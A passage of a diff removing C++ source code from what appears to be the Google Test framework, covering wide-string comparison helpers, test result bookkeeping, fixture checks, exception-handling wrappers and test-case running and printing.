-    } else if (i + 1 < num_chars && IsUtf16SurrogatePair(str[i], str[i + 1])) {
-      unicode_code_point = CreateCodePointFromUtf16SurrogatePair(str[i],
-                                                                 str[i + 1]);
-      i++;
-    } else {
-      unicode_code_point = static_cast<UInt32>(str[i]);
-    }
-
-    stream << CodePointToUtf8(unicode_code_point);
-  }
-  return StringStreamToString(&stream);
-}
-
-// Converts a wide C string to an std::string using the UTF-8 encoding.
-// NULL will be converted to "(null)".
-std::string String::ShowWideCString(const wchar_t * wide_c_str) {
-  if (wide_c_str == NULL)  return "(null)";
-
-  return internal::WideStringToUtf8(wide_c_str, -1);
-}
-
-// Compares two wide C strings.  Returns true iff they have the same
-// content.
-//
-// Unlike wcscmp(), this function can handle NULL argument(s).  A NULL
-// C string is considered different to any non-NULL C string,
-// including the empty string.
-bool String::WideCStringEquals(const wchar_t * lhs, const wchar_t * rhs) {
-  if (lhs == NULL) return rhs == NULL;
-
-  if (rhs == NULL) return false;
-
-  return wcscmp(lhs, rhs) == 0;
-}
-
-// Helper function for *_STREQ on wide strings.
-AssertionResult CmpHelperSTREQ(const char* expected_expression,
-                               const char* actual_expression,
-                               const wchar_t* expected,
-                               const wchar_t* actual) {
-  if (String::WideCStringEquals(expected, actual)) {
-    return AssertionSuccess();
-  }
-
-  return EqFailure(expected_expression,
-                   actual_expression,
-                   PrintToString(expected),
-                   PrintToString(actual),
-                   false);
-}
-
-// Helper function for *_STRNE on wide strings.
-AssertionResult CmpHelperSTRNE(const char* s1_expression,
-                               const char* s2_expression,
-                               const wchar_t* s1,
-                               const wchar_t* s2) {
-  if (!String::WideCStringEquals(s1, s2)) {
-    return AssertionSuccess();
-  }
-
-  return AssertionFailure() << "Expected: (" << s1_expression << ") != ("
-                            << s2_expression << "), actual: "
-                            << PrintToString(s1)
-                            << " vs " << PrintToString(s2);
-}
-
-// Compares two C strings, ignoring case.  Returns true iff they have
-// the same content.
-//
-// Unlike strcasecmp(), this function can handle NULL argument(s).  A
-// NULL C string is considered different to any non-NULL C string,
-// including the empty string.
-bool String::CaseInsensitiveCStringEquals(const char * lhs, const char * rhs) {
-  if (lhs == NULL)
-    return rhs == NULL;
-  if (rhs == NULL)
-    return false;
-  return posix::StrCaseCmp(lhs, rhs) == 0;
-}
-
-  // Compares two wide C strings, ignoring case.  Returns true iff they
-  // have the same content.
-  //
-  // Unlike wcscasecmp(), this function can handle NULL argument(s).
-  // A NULL C string is considered different to any non-NULL wide C string,
-  // including the empty string.
-  // NB: The implementations on different platforms slightly differ.
-  // On windows, this method uses _wcsicmp which compares according to LC_CTYPE
-  // environment variable. On GNU platform this method uses wcscasecmp
-  // which compares according to LC_CTYPE category of the current locale.
-  // On MacOS X, it uses towlower, which also uses LC_CTYPE category of the
-  // current locale.
-bool String::CaseInsensitiveWideCStringEquals(const wchar_t* lhs,
-                                              const wchar_t* rhs) {
-  if (lhs == NULL) return rhs == NULL;
-
-  if (rhs == NULL) return false;
-
-#if GTEST_OS_WINDOWS
-  return _wcsicmp(lhs, rhs) == 0;
-#elif GTEST_OS_LINUX && !GTEST_OS_LINUX_ANDROID
-  return wcscasecmp(lhs, rhs) == 0;
-#else
-  // Android, Mac OS X and Cygwin don't define wcscasecmp.
-  // Other unknown OSes may not define it either.
-  wint_t left, right;
-  do {
-    left = towlower(*lhs++);
-    right = towlower(*rhs++);
-  } while (left && left == right);
-  return left == right;
-#endif  // OS selector
-}
-
-// Returns true iff str ends with the given suffix, ignoring case.
-// Any string is considered to end with an empty suffix.
-bool String::EndsWithCaseInsensitive(
-    const std::string& str, const std::string& suffix) {
-  const size_t str_len = str.length();
-  const size_t suffix_len = suffix.length();
-  return (str_len >= suffix_len) &&
-         CaseInsensitiveCStringEquals(str.c_str() + str_len - suffix_len,
-                                      suffix.c_str());
-}
-
-// Formats an int value as "%02d".
-std::string String::FormatIntWidth2(int value) {
-  std::stringstream ss;
-  ss << std::setfill('0') << std::setw(2) << value;
-  return ss.str();
-}
-
-// Formats an int value as "%X".
-std::string String::FormatHexInt(int value) {
-  std::stringstream ss;
-  ss << std::hex << std::uppercase << value;
-  return ss.str();
-}
-
-// Formats a byte as "%02X".
-std::string String::FormatByte(unsigned char value) {
-  std::stringstream ss;
-  ss << std::setfill('0') << std::setw(2) << std::hex << std::uppercase
-     << static_cast<unsigned int>(value);
-  return ss.str();
-}
-
-// Converts the buffer in a stringstream to an std::string, converting NUL
-// bytes to "\\0" along the way.
-std::string StringStreamToString(::std::stringstream* ss) {
-  const ::std::string& str = ss->str();
-  const char* const start = str.c_str();
-  const char* const end = start + str.length();
-
-  std::string result;
-  result.reserve(2 * (end - start));
-  for (const char* ch = start; ch != end; ++ch) {
-    if (*ch == '\0') {
-      result += "\\0";  // Replaces NUL with "\\0";
-    } else {
-      result += *ch;
-    }
-  }
-
-  return result;
-}
-
-// Appends the user-supplied message to the Google-Test-generated message.
-std::string AppendUserMessage(const std::string& gtest_msg,
-                              const Message& user_msg) {
-  // Appends the user message if it's non-empty.
-  const std::string user_msg_string = user_msg.GetString();
-  if (user_msg_string.empty()) {
-    return gtest_msg;
-  }
-
-  return gtest_msg + "\n" + user_msg_string;
-}
-
-}  // namespace internal
-
-// class TestResult
-
-// Creates an empty TestResult.
-TestResult::TestResult()
-    : death_test_count_(0),
-      elapsed_time_(0) {
-}
-
-// D'tor.
-TestResult::~TestResult() {
-}
-
-// Returns the i-th test part result among all the results. i can
-// range from 0 to total_part_count() - 1. If i is not in that range,
-// aborts the program.
-const TestPartResult& TestResult::GetTestPartResult(int i) const {
-  if (i < 0 || i >= total_part_count())
-    internal::posix::Abort();
-  return test_part_results_.at(i);
-}
-
-// Returns the i-th test property. i can range from 0 to
-// test_property_count() - 1. If i is not in that range, aborts the
-// program.
-const TestProperty& TestResult::GetTestProperty(int i) const {
-  if (i < 0 || i >= test_property_count())
-    internal::posix::Abort();
-  return test_properties_.at(i);
-}
-
-// Clears the test part results.
-void TestResult::ClearTestPartResults() {
-  test_part_results_.clear();
-}
-
-// Adds a test part result to the list.
-void TestResult::AddTestPartResult(const TestPartResult& test_part_result) {
-  test_part_results_.push_back(test_part_result);
-}
-
-// Adds a test property to the list. If a property with the same key as the
-// supplied property is already represented, the value of this test_property
-// replaces the old value for that key.
-void TestResult::RecordProperty(const std::string& xml_element,
-                                const TestProperty& test_property) {
-  if (!ValidateTestProperty(xml_element, test_property)) {
-    return;
-  }
-  internal::MutexLock lock(&test_properites_mutex_);
-  const std::vector<TestProperty>::iterator property_with_matching_key =
-      std::find_if(test_properties_.begin(), test_properties_.end(),
-                   internal::TestPropertyKeyIs(test_property.key()));
-  if (property_with_matching_key == test_properties_.end()) {
-    test_properties_.push_back(test_property);
-    return;
-  }
-  property_with_matching_key->SetValue(test_property.value());
-}
-
-// The list of reserved attributes used in the <testsuites> element of XML
-// output.
-static const char* const kReservedTestSuitesAttributes[] = {
-  "disabled",
-  "errors",
-  "failures",
-  "name",
-  "random_seed",
-  "tests",
-  "time",
-  "timestamp"
-};
-
-// The list of reserved attributes used in the <testsuite> element of XML
-// output.
-static const char* const kReservedTestSuiteAttributes[] = {
-  "disabled",
-  "errors",
-  "failures",
-  "name",
-  "tests",
-  "time"
-};
-
-// The list of reserved attributes used in the <testcase> element of XML output.
-static const char* const kReservedTestCaseAttributes[] = {
-  "classname",
-  "name",
-  "status",
-  "time",
-  "type_param",
-  "value_param"
-};
-
-template <int kSize>
-std::vector<std::string> ArrayAsVector(const char* const (&array)[kSize]) {
-  return std::vector<std::string>(array, array + kSize);
-}
-
-static std::vector<std::string> GetReservedAttributesForElement(
-    const std::string& xml_element) {
-  if (xml_element == "testsuites") {
-    return ArrayAsVector(kReservedTestSuitesAttributes);
-  } else if (xml_element == "testsuite") {
-    return ArrayAsVector(kReservedTestSuiteAttributes);
-  } else if (xml_element == "testcase") {
-    return ArrayAsVector(kReservedTestCaseAttributes);
-  } else {
-    GTEST_CHECK_(false) << "Unrecognized xml_element provided: " << xml_element;
-  }
-  // This code is unreachable but some compilers may not realizes that.
-  return std::vector<std::string>();
-}
-
-static std::string FormatWordList(const std::vector<std::string>& words) {
-  Message word_list;
-  for (size_t i = 0; i < words.size(); ++i) {
-    if (i > 0 && words.size() > 2) {
-      word_list << ", ";
-    }
-    if (i == words.size() - 1) {
-      word_list << "and ";
-    }
-    word_list << "'" << words[i] << "'";
-  }
-  return word_list.GetString();
-}
-
-bool ValidateTestPropertyName(const std::string& property_name,
-                              const std::vector<std::string>& reserved_names) {
-  if (std::find(reserved_names.begin(), reserved_names.end(), property_name) !=
-          reserved_names.end()) {
-    ADD_FAILURE() << "Reserved key used in RecordProperty(): " << property_name
-                  << " (" << FormatWordList(reserved_names)
-                  << " are reserved by " << GTEST_NAME_ << ")";
-    return false;
-  }
-  return true;
-}
-
-// Adds a failure if the key is a reserved attribute of the element named
-// xml_element.  Returns true if the property is valid.
-bool TestResult::ValidateTestProperty(const std::string& xml_element,
-                                      const TestProperty& test_property) {
-  return ValidateTestPropertyName(test_property.key(),
-                                  GetReservedAttributesForElement(xml_element));
-}
-
-// Clears the object.
-void TestResult::Clear() {
-  test_part_results_.clear();
-  test_properties_.clear();
-  death_test_count_ = 0;
-  elapsed_time_ = 0;
-}
-
-// Returns true iff the test failed.
-bool TestResult::Failed() const {
-  for (int i = 0; i < total_part_count(); ++i) {
-    if (GetTestPartResult(i).failed())
-      return true;
-  }
-  return false;
-}
-
-// Returns true iff the test part fatally failed.
-static bool TestPartFatallyFailed(const TestPartResult& result) {
-  return result.fatally_failed();
-}
-
-// Returns true iff the test fatally failed.
-bool TestResult::HasFatalFailure() const {
-  return CountIf(test_part_results_, TestPartFatallyFailed) > 0;
-}
-
-// Returns true iff the test part non-fatally failed.
-static bool TestPartNonfatallyFailed(const TestPartResult& result) {
-  return result.nonfatally_failed();
-}
-
-// Returns true iff the test has a non-fatal failure.
-bool TestResult::HasNonfatalFailure() const {
-  return CountIf(test_part_results_, TestPartNonfatallyFailed) > 0;
-}
-
-// Gets the number of all test parts.  This is the sum of the number
-// of successful test parts and the number of failed test parts.
-int TestResult::total_part_count() const {
-  return static_cast<int>(test_part_results_.size());
-}
-
-// Returns the number of the test properties.
-int TestResult::test_property_count() const {
-  return static_cast<int>(test_properties_.size());
-}
-
-// class Test
-
-// Creates a Test object.
-
-// The c'tor saves the values of all Google Test flags.
-Test::Test()
-    : gtest_flag_saver_(new internal::GTestFlagSaver) {
-}
-
-// The d'tor restores the values of all Google Test flags.
-Test::~Test() {
-  delete gtest_flag_saver_;
-}
-
-// Sets up the test fixture.
-//
-// A sub-class may override this.
-void Test::SetUp() {
-}
-
-// Tears down the test fixture.
-//
-// A sub-class may override this.
-void Test::TearDown() {
-}
-
-// Allows user supplied key value pairs to be recorded for later output.
-void Test::RecordProperty(const std::string& key, const std::string& value) {
-  UnitTest::GetInstance()->RecordProperty(key, value);
-}
-
-// Allows user supplied key value pairs to be recorded for later output.
-void Test::RecordProperty(const std::string& key, int value) {
-  Message value_message;
-  value_message << value;
-  RecordProperty(key, value_message.GetString().c_str());
-}
-
-namespace internal {
-
-void ReportFailureInUnknownLocation(TestPartResult::Type result_type,
-                                    const std::string& message) {
-  // This function is a friend of UnitTest and as such has access to
-  // AddTestPartResult.
-  UnitTest::GetInstance()->AddTestPartResult(
-      result_type,
-      NULL,  // No info about the source file where the exception occurred.
-      -1,    // We have no info on which line caused the exception.
-      message,
-      "");   // No stack trace, either.
-}
-
-}  // namespace internal
-
-// Google Test requires all tests in the same test case to use the same test
-// fixture class.  This function checks if the current test has the
-// same fixture class as the first test in the current test case.  If
-// yes, it returns true; otherwise it generates a Google Test failure and
-// returns false.
-bool Test::HasSameFixtureClass() {
-  internal::UnitTestImpl* const impl = internal::GetUnitTestImpl();
-  const TestCase* const test_case = impl->current_test_case();
-
-  // Info about the first test in the current test case.
-  const TestInfo* const first_test_info = test_case->test_info_list()[0];
-  const internal::TypeId first_fixture_id = first_test_info->fixture_class_id_;
-  const char* const first_test_name = first_test_info->name();
-
-  // Info about the current test.
-  const TestInfo* const this_test_info = impl->current_test_info();
-  const internal::TypeId this_fixture_id = this_test_info->fixture_class_id_;
-  const char* const this_test_name = this_test_info->name();
-
-  if (this_fixture_id != first_fixture_id) {
-    // Is the first test defined using TEST?
-    const bool first_is_TEST = first_fixture_id == internal::GetTestTypeId();
-    // Is this test defined using TEST?
-    const bool this_is_TEST = this_fixture_id == internal::GetTestTypeId();
-
-    if (first_is_TEST || this_is_TEST) {
-      // Both TEST and TEST_F appear in same test case, which is incorrect.
-      // Tell the user how to fix this.
-
-      // Gets the name of the TEST and the name of the TEST_F.  Note
-      // that first_is_TEST and this_is_TEST cannot both be true, as
-      // the fixture IDs are different for the two tests.
-      const char* const TEST_name =
-          first_is_TEST ? first_test_name : this_test_name;
-      const char* const TEST_F_name =
-          first_is_TEST ? this_test_name : first_test_name;
-
-      ADD_FAILURE()
-          << "All tests in the same test case must use the same test fixture\n"
-          << "class, so mixing TEST_F and TEST in the same test case is\n"
-          << "illegal.  In test case " << this_test_info->test_case_name()
-          << ",\n"
-          << "test " << TEST_F_name << " is defined using TEST_F but\n"
-          << "test " << TEST_name << " is defined using TEST.  You probably\n"
-          << "want to change the TEST to TEST_F or move it to another test\n"
-          << "case.";
-    } else {
-      // Two fixture classes with the same name appear in two different
-      // namespaces, which is not allowed. Tell the user how to fix this.
-      ADD_FAILURE()
-          << "All tests in the same test case must use the same test fixture\n"
-          << "class.  However, in test case "
-          << this_test_info->test_case_name() << ",\n"
-          << "you defined test " << first_test_name
-          << " and test " << this_test_name << "\n"
-          << "using two different test fixture classes.  This can happen if\n"
-          << "the two classes are from different namespaces or translation\n"
-          << "units and have the same name.  You should probably rename one\n"
-          << "of the classes to put the tests into different test cases.";
-    }
-    return false;
-  }
-
-  return true;
-}
-
-#if GTEST_HAS_SEH
-
-// Adds an "exception thrown" fatal failure to the current test.  This
-// function returns its result via an output parameter pointer because VC++
-// prohibits creation of objects with destructors on stack in functions
-// using __try (see error C2712).
-static std::string* FormatSehExceptionMessage(DWORD exception_code,
-                                              const char* location) {
-  Message message;
-  message << "SEH exception with code 0x" << std::setbase(16) <<
-    exception_code << std::setbase(10) << " thrown in " << location << ".";
-
-  return new std::string(message.GetString());
-}
-
-#endif  // GTEST_HAS_SEH
-
-namespace internal {
-
-#if GTEST_HAS_EXCEPTIONS
-
-// Adds an "exception thrown" fatal failure to the current test.
-static std::string FormatCxxExceptionMessage(const char* description,
-                                             const char* location) {
-  Message message;
-  if (description != NULL) {
-    message << "C++ exception with description \"" << description << "\"";
-  } else {
-    message << "Unknown C++ exception";
-  }
-  message << " thrown in " << location << ".";
-
-  return message.GetString();
-}
-
-static std::string PrintTestPartResultToString(
-    const TestPartResult& test_part_result);
-
-GoogleTestFailureException::GoogleTestFailureException(
-    const TestPartResult& failure)
-    : ::std::runtime_error(PrintTestPartResultToString(failure).c_str()) {}
-
-#endif  // GTEST_HAS_EXCEPTIONS
-
-// We put these helper functions in the internal namespace as IBM's xlC
-// compiler rejects the code if they were declared static.
-
-// Runs the given method and handles SEH exceptions it throws, when
-// SEH is supported; returns the 0-value for type Result in case of an
-// SEH exception.  (Microsoft compilers cannot handle SEH and C++
-// exceptions in the same function.  Therefore, we provide a separate
-// wrapper function for handling SEH exceptions.)
-template <class T, typename Result>
-Result HandleSehExceptionsInMethodIfSupported(
-    T* object, Result (T::*method)(), const char* location) {
-#if GTEST_HAS_SEH
-  __try {
-    return (object->*method)();
-  } __except (internal::UnitTestOptions::GTestShouldProcessSEH(  // NOLINT
-      GetExceptionCode())) {
-    // We create the exception message on the heap because VC++ prohibits
-    // creation of objects with destructors on stack in functions using __try
-    // (see error C2712).
-    std::string* exception_message = FormatSehExceptionMessage(
-        GetExceptionCode(), location);
-    internal::ReportFailureInUnknownLocation(TestPartResult::kFatalFailure,
-                                             *exception_message);
-    delete exception_message;
-    return static_cast<Result>(0);
-  }
-#else
-  (void)location;
-  return (object->*method)();
-#endif  // GTEST_HAS_SEH
-}
-
-// Runs the given method and catches and reports C++ and/or SEH-style
-// exceptions, if they are supported; returns the 0-value for type
-// Result in case of an SEH exception.
-template <class T, typename Result>
-Result HandleExceptionsInMethodIfSupported(
-    T* object, Result (T::*method)(), const char* location) {
-  // NOTE: The user code can affect the way in which Google Test handles
-  // exceptions by setting GTEST_FLAG(catch_exceptions), but only before
-  // RUN_ALL_TESTS() starts. It is technically possible to check the flag
-  // after the exception is caught and either report or re-throw the
-  // exception based on the flag's value:
-  //
-  // try {
-  //   // Perform the test method.
-  // } catch (...) {
-  //   if (GTEST_FLAG(catch_exceptions))
-  //     // Report the exception as failure.
-  //   else
-  //     throw;  // Re-throws the original exception.
-  // }
-  //
-  // However, the purpose of this flag is to allow the program to drop into
-  // the debugger when the exception is thrown. On most platforms, once the
-  // control enters the catch block, the exception origin information is
-  // lost and the debugger will stop the program at the point of the
-  // re-throw in this function -- instead of at the point of the original
-  // throw statement in the code under test.  For this reason, we perform
-  // the check early, sacrificing the ability to affect Google Test's
-  // exception handling in the method where the exception is thrown.
-  if (internal::GetUnitTestImpl()->catch_exceptions()) {
-#if GTEST_HAS_EXCEPTIONS
-    try {
-      return HandleSehExceptionsInMethodIfSupported(object, method, location);
-    } catch (const internal::GoogleTestFailureException&) {  // NOLINT
-      // This exception type can only be thrown by a failed Google
-      // Test assertion with the intention of letting another testing
-      // framework catch it.  Therefore we just re-throw it.
-      throw;
-    } catch (const std::exception& e) {  // NOLINT
-      internal::ReportFailureInUnknownLocation(
-          TestPartResult::kFatalFailure,
-          FormatCxxExceptionMessage(e.what(), location));
-    } catch (...) {  // NOLINT
-      internal::ReportFailureInUnknownLocation(
-          TestPartResult::kFatalFailure,
-          FormatCxxExceptionMessage(NULL, location));
-    }
-    return static_cast<Result>(0);
-#else
-    return HandleSehExceptionsInMethodIfSupported(object, method, location);
-#endif  // GTEST_HAS_EXCEPTIONS
-  } else {
-    return (object->*method)();
-  }
-}
-
-}  // namespace internal
-
-// Runs the test and updates the test result.
-void Test::Run() {
-  if (!HasSameFixtureClass()) return;
-
-  internal::UnitTestImpl* const impl = internal::GetUnitTestImpl();
-  impl->os_stack_trace_getter()->UponLeavingGTest();
-  internal::HandleExceptionsInMethodIfSupported(this, &Test::SetUp, "SetUp()");
-  // We will run the test only if SetUp() was successful.
-  if (!HasFatalFailure()) {
-    impl->os_stack_trace_getter()->UponLeavingGTest();
-    internal::HandleExceptionsInMethodIfSupported(
-        this, &Test::TestBody, "the test body");
-  }
-
-  // However, we want to clean up as much as possible.  Hence we will
-  // always call TearDown(), even if SetUp() or the test body has
-  // failed.
-  impl->os_stack_trace_getter()->UponLeavingGTest();
-  internal::HandleExceptionsInMethodIfSupported(
-      this, &Test::TearDown, "TearDown()");
-}
-
-// Returns true iff the current test has a fatal failure.
-bool Test::HasFatalFailure() {
-  return internal::GetUnitTestImpl()->current_test_result()->HasFatalFailure();
-}
-
-// Returns true iff the current test has a non-fatal failure.
-bool Test::HasNonfatalFailure() {
-  return internal::GetUnitTestImpl()->current_test_result()->
-      HasNonfatalFailure();
-}
-
-// class TestInfo
-
-// Constructs a TestInfo object. It assumes ownership of the test factory
-// object.
-TestInfo::TestInfo(const std::string& a_test_case_name,
-                   const std::string& a_name,
-                   const char* a_type_param,
-                   const char* a_value_param,
-                   internal::TypeId fixture_class_id,
-                   internal::TestFactoryBase* factory)
-    : test_case_name_(a_test_case_name),
-      name_(a_name),
-      type_param_(a_type_param ? new std::string(a_type_param) : NULL),
-      value_param_(a_value_param ? new std::string(a_value_param) : NULL),
-      fixture_class_id_(fixture_class_id),
-      should_run_(false),
-      is_disabled_(false),
-      matches_filter_(false),
-      factory_(factory),
-      result_() {}
-
-// Destructs a TestInfo object.
-TestInfo::~TestInfo() { delete factory_; }
-
-namespace internal {
-
-// Creates a new TestInfo object and registers it with Google Test;
-// returns the created object.
-//
-// Arguments:
-//
-//   test_case_name:   name of the test case
-//   name:             name of the test
-//   type_param:       the name of the test's type parameter, or NULL if
-//                     this is not a typed or a type-parameterized test.
-//   value_param:      text representation of the test's value parameter,
-//                     or NULL if this is not a value-parameterized test.
-//   fixture_class_id: ID of the test fixture class
-//   set_up_tc:        pointer to the function that sets up the test case
-//   tear_down_tc:     pointer to the function that tears down the test case
-//   factory:          pointer to the factory that creates a test object.
-//                     The newly created TestInfo instance will assume
-//                     ownership of the factory object.
-TestInfo* MakeAndRegisterTestInfo(
-    const char* test_case_name,
-    const char* name,
-    const char* type_param,
-    const char* value_param,
-    TypeId fixture_class_id,
-    SetUpTestCaseFunc set_up_tc,
-    TearDownTestCaseFunc tear_down_tc,
-    TestFactoryBase* factory) {
-  TestInfo* const test_info =
-      new TestInfo(test_case_name, name, type_param, value_param,
-                   fixture_class_id, factory);
-  GetUnitTestImpl()->AddTestInfo(set_up_tc, tear_down_tc, test_info);
-  return test_info;
-}
-
-#if GTEST_HAS_PARAM_TEST
-void ReportInvalidTestCaseType(const char* test_case_name,
-                               const char* file, int line) {
-  Message errors;
-  errors
-      << "Attempted redefinition of test case " << test_case_name << ".\n"
-      << "All tests in the same test case must use the same test fixture\n"
-      << "class.  However, in test case " << test_case_name << ", you tried\n"
-      << "to define a test using a fixture class different from the one\n"
-      << "used earlier. This can happen if the two fixture classes are\n"
-      << "from different namespaces and have the same name. You should\n"
-      << "probably rename one of the classes to put the tests into different\n"
-      << "test cases.";
-
-  fprintf(stderr, "%s %s", FormatFileLocation(file, line).c_str(),
-          errors.GetString().c_str());
-}
-#endif  // GTEST_HAS_PARAM_TEST
-
-}  // namespace internal
-
-namespace {
-
-// A predicate that checks the test name of a TestInfo against a known
-// value.
-//
-// This is used for implementation of the TestCase class only.  We put
-// it in the anonymous namespace to prevent polluting the outer
-// namespace.
-//
-// TestNameIs is copyable.
-class TestNameIs {
- public:
-  // Constructor.
-  //
-  // TestNameIs has NO default constructor.
-  explicit TestNameIs(const char* name)
-      : name_(name) {}
-
-  // Returns true iff the test name of test_info matches name_.
-  bool operator()(const TestInfo * test_info) const {
-    return test_info && test_info->name() == name_;
-  }
-
- private:
-  std::string name_;
-};
-
-}  // namespace
-
-namespace internal {
-
-// This method expands all parameterized tests registered with macros TEST_P
-// and INSTANTIATE_TEST_CASE_P into regular tests and registers those.
-// This will be done just once during the program runtime.
-void UnitTestImpl::RegisterParameterizedTests() {
-#if GTEST_HAS_PARAM_TEST
-  if (!parameterized_tests_registered_) {
-    parameterized_test_registry_.RegisterTests();
-    parameterized_tests_registered_ = true;
-  }
-#endif
-}
-
-}  // namespace internal
-
-// Creates the test object, runs it, records its result, and then
-// deletes it.
-void TestInfo::Run() {
-  if (!should_run_) return;
-
-  // Tells UnitTest where to store test result.
-  internal::UnitTestImpl* const impl = internal::GetUnitTestImpl();
-  impl->set_current_test_info(this);
-
-  TestEventListener* repeater = UnitTest::GetInstance()->listeners().repeater();
-
-  // Notifies the unit test event listeners that a test is about to start.
-  repeater->OnTestStart(*this);
-
-  const TimeInMillis start = internal::GetTimeInMillis();
-
-  impl->os_stack_trace_getter()->UponLeavingGTest();
-
-  // Creates the test object.
-  Test* const test = internal::HandleExceptionsInMethodIfSupported(
-      factory_, &internal::TestFactoryBase::CreateTest,
-      "the test fixture's constructor");
-
-  // Runs the test only if the test object was created and its
-  // constructor didn't generate a fatal failure.
-  if ((test != NULL) && !Test::HasFatalFailure()) {
-    // This doesn't throw as all user code that can throw are wrapped into
-    // exception handling code.
-    test->Run();
-  }
-
-  // Deletes the test object.
-  impl->os_stack_trace_getter()->UponLeavingGTest();
-  internal::HandleExceptionsInMethodIfSupported(
-      test, &Test::DeleteSelf_, "the test fixture's destructor");
-
-  result_.set_elapsed_time(internal::GetTimeInMillis() - start);
-
-  // Notifies the unit test event listener that a test has just finished.
-  repeater->OnTestEnd(*this);
-
-  // Tells UnitTest to stop associating assertion results to this
-  // test.
-  impl->set_current_test_info(NULL);
-}
-
-// class TestCase
-
-// Gets the number of successful tests in this test case.
-int TestCase::successful_test_count() const {
-  return CountIf(test_info_list_, TestPassed);
-}
-
-// Gets the number of failed tests in this test case.
-int TestCase::failed_test_count() const {
-  return CountIf(test_info_list_, TestFailed);
-}
-
-// Gets the number of disabled tests that will be reported in the XML report.
-int TestCase::reportable_disabled_test_count() const {
-  return CountIf(test_info_list_, TestReportableDisabled);
-}
-
-// Gets the number of disabled tests in this test case.
-int TestCase::disabled_test_count() const {
-  return CountIf(test_info_list_, TestDisabled);
-}
-
-// Gets the number of tests to be printed in the XML report.
-int TestCase::reportable_test_count() const {
-  return CountIf(test_info_list_, TestReportable);
-}
-
-// Get the number of tests in this test case that should run.
-int TestCase::test_to_run_count() const {
-  return CountIf(test_info_list_, ShouldRunTest);
-}
-
-// Gets the number of all tests.
-int TestCase::total_test_count() const {
-  return static_cast<int>(test_info_list_.size());
-}
-
-// Creates a TestCase with the given name.
-//
-// Arguments:
-//
-//   name:         name of the test case
-//   a_type_param: the name of the test case's type parameter, or NULL if
-//                 this is not a typed or a type-parameterized test case.
-//   set_up_tc:    pointer to the function that sets up the test case
-//   tear_down_tc: pointer to the function that tears down the test case
-TestCase::TestCase(const char* a_name, const char* a_type_param,
-                   Test::SetUpTestCaseFunc set_up_tc,
-                   Test::TearDownTestCaseFunc tear_down_tc)
-    : name_(a_name),
-      type_param_(a_type_param ? new std::string(a_type_param) : NULL),
-      set_up_tc_(set_up_tc),
-      tear_down_tc_(tear_down_tc),
-      should_run_(false),
-      elapsed_time_(0) {
-}
-
-// Destructor of TestCase.
-TestCase::~TestCase() {
-  // Deletes every Test in the collection.
-  ForEach(test_info_list_, internal::Delete<TestInfo>);
-}
-
-// Returns the i-th test among all the tests. i can range from 0 to
-// total_test_count() - 1. If i is not in that range, returns NULL.
-const TestInfo* TestCase::GetTestInfo(int i) const {
-  const int index = GetElementOr(test_indices_, i, -1);
-  return index < 0 ? NULL : test_info_list_[index];
-}
-
-// Returns the i-th test among all the tests. i can range from 0 to
-// total_test_count() - 1. If i is not in that range, returns NULL.
-TestInfo* TestCase::GetMutableTestInfo(int i) {
-  const int index = GetElementOr(test_indices_, i, -1);
-  return index < 0 ? NULL : test_info_list_[index];
-}
-
-// Adds a test to this test case.  Will delete the test upon
-// destruction of the TestCase object.
-void TestCase::AddTestInfo(TestInfo * test_info) {
-  test_info_list_.push_back(test_info);
-  test_indices_.push_back(static_cast<int>(test_indices_.size()));
-}
-
-// Runs every test in this TestCase.
-void TestCase::Run() {
-  if (!should_run_) return;
-
-  internal::UnitTestImpl* const impl = internal::GetUnitTestImpl();
-  impl->set_current_test_case(this);
-
-  TestEventListener* repeater = UnitTest::GetInstance()->listeners().repeater();
-
-  repeater->OnTestCaseStart(*this);
-  impl->os_stack_trace_getter()->UponLeavingGTest();
-  internal::HandleExceptionsInMethodIfSupported(
-      this, &TestCase::RunSetUpTestCase, "SetUpTestCase()");
-
-  const internal::TimeInMillis start = internal::GetTimeInMillis();
-  for (int i = 0; i < total_test_count(); i++) {
-    GetMutableTestInfo(i)->Run();
-  }
-  elapsed_time_ = internal::GetTimeInMillis() - start;
-
-  impl->os_stack_trace_getter()->UponLeavingGTest();
-  internal::HandleExceptionsInMethodIfSupported(
-      this, &TestCase::RunTearDownTestCase, "TearDownTestCase()");
-
-  repeater->OnTestCaseEnd(*this);
-  impl->set_current_test_case(NULL);
-}
-
-// Clears the results of all tests in this test case.
-void TestCase::ClearResult() {
-  ad_hoc_test_result_.Clear();
-  ForEach(test_info_list_, TestInfo::ClearTestResult);
-}
-
-// Shuffles the tests in this test case.
-void TestCase::ShuffleTests(internal::Random* random) {
-  Shuffle(random, &test_indices_);
-}
-
-// Restores the test order to before the first shuffle.
-void TestCase::UnshuffleTests() {
-  for (size_t i = 0; i < test_indices_.size(); i++) {
-    test_indices_[i] = static_cast<int>(i);
-  }
-}
-
-// Formats a countable noun.  Depending on its quantity, either the
-// singular form or the plural form is used. e.g.
-//
-// FormatCountableNoun(1, "formula", "formuli") returns "1 formula".
-// FormatCountableNoun(5, "book", "books") returns "5 books".
-static std::string FormatCountableNoun(int count,
-                                       const char * singular_form,
-                                       const char * plural_form) {
-  return internal::StreamableToString(count) + " " +
-      (count == 1 ? singular_form : plural_form);
-}
-
-// Formats the count of tests.
-static std::string FormatTestCount(int test_count) {
-  return FormatCountableNoun(test_count, "test", "tests");
-}
-
-// Formats the count of test cases.
-static std::string FormatTestCaseCount(int test_case_count) {
-  return FormatCountableNoun(test_case_count, "test case", "test cases");
-}
-
-// Converts a TestPartResult::Type enum to human-friendly string
-// representation.  Both kNonFatalFailure and kFatalFailure are translated
-// to "Failure", as the user usually doesn't care about the difference
-// between the two when viewing the test result.
-static const char * TestPartResultTypeToString(TestPartResult::Type type) {
-  switch (type) {
-    case TestPartResult::kSuccess:
-      return "Success";
-
-    case TestPartResult::kNonFatalFailure:
-    case TestPartResult::kFatalFailure:
-#ifdef _MSC_VER
-      return "error: ";
-#else
-      return "Failure\n";
-#endif
-    default:
-      return "Unknown result type";
-  }
-}
-
-namespace internal {
-
-// Prints a TestPartResult to an std::string.
-static std::string PrintTestPartResultToString(
-    const TestPartResult& test_part_result) {
-  return (Message()
-          << internal::FormatFileLocation(test_part_result.file_name(),
-                                          test_part_result.line_number())
-          << " " << TestPartResultTypeToString(test_part_result.type())
-          << test_part_result.message()).GetString();
-}
-
-// Prints a TestPartResult.
-static void PrintTestPartResult(const TestPartResult& test_part_result) {
-  const std::string& result =
-      PrintTestPartResultToString(test_part_result);
-  printf("%s\n", result.c_str());
-  fflush(stdout);
-  // If the test program runs in Visual Studio or a debugger, the
-  // following statements add the test part result message to the Output
-  // window such that the user can double-click on it to jump to the
